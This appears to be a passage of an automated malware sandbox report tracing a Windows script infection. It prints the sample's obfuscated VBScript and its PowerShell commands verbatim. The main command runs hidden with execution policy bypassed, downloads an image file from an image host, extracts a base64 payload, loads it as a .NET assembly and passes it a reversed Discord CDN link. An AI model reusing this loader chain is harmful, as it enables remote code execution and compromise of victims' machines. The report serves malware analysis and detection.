          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Network");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\Brother", "Brother");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\HP", "HP");IWshNetwork2.MapNetworkDrive("P:", "\\SRVHOMOLOGDC1\Publica", "true");IWshNetwork2.MapNetworkDrive("E:", "\\SRVHOMOLOGDC1\Digitalizacoes", "true");IHost.CreateObject("WScript.Shell");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\RD Web Access.lnk");IWshShortcut.TargetPath("http://app01.system.com.br/RDWeb/Pages/login.aspx");IWshShortcut.IconLocation("\\SRVHOMOLOGDC1\Icones\favicon.ico");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\Pasta_do_Departamento.lnk");IWshShortcut.TargetPath("S:\");IWshShortcut.WindowStyle("1");IWshShortcut.Description("Pasta_do_Departamento");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\Pasta_Publica.lnk");IWshShortcut.TargetPath("P:\");IWshShortcut.WindowStyle("1");IWshShortcut.Description("Pasta_Publica");IWshShell3.SendKeys("{F5}");IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/ZKQQ9", "false");IServerXMLHTTPRequest2.send(); dim mudador , taurim , aligulado , enjaular , linguete , Cama , linguete1 taurim = " " aligulado = "" & enjaular & taurim & enjaular & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & enjaular & taurim & enjaular & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & enjaular & taurim & enjaular & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & enjaular & taurim & enjaular & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & enjaular & taurim & enjaular & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & enjaular & taurim & enjaular & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & enjaular & taurim & enjaular & "DgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTre" & enjaular & taurim & enjaular & "DgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTre" & enjaular & taurim & enjaular & "gBsDgTreGUDgTre" & enjaular & taurim & enjaular & "DgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & enjaular & taurim & enjaular & "gBvDgTreHIDgTre" & enjaular & taurim & enjaular & "QBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgT
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTre
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&bee0e3e6d1a3438062cea2274c106b5c8af7ca4b988a99cbe8e3c73825db8986=mh&d9ac3366=si&d1c15366=xe?txt.elif/5863426205721465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&bee0e3e6d1a3438062cea2274c106b5c8af7ca4b988a99cbe8e3c73825db8986=mh&d9ac3366=si&d1c15366=xe?txt.elif/5863426205721465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAB7909CD push E85E525Dh; ret 14_2_00007FFAAB7909F9
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
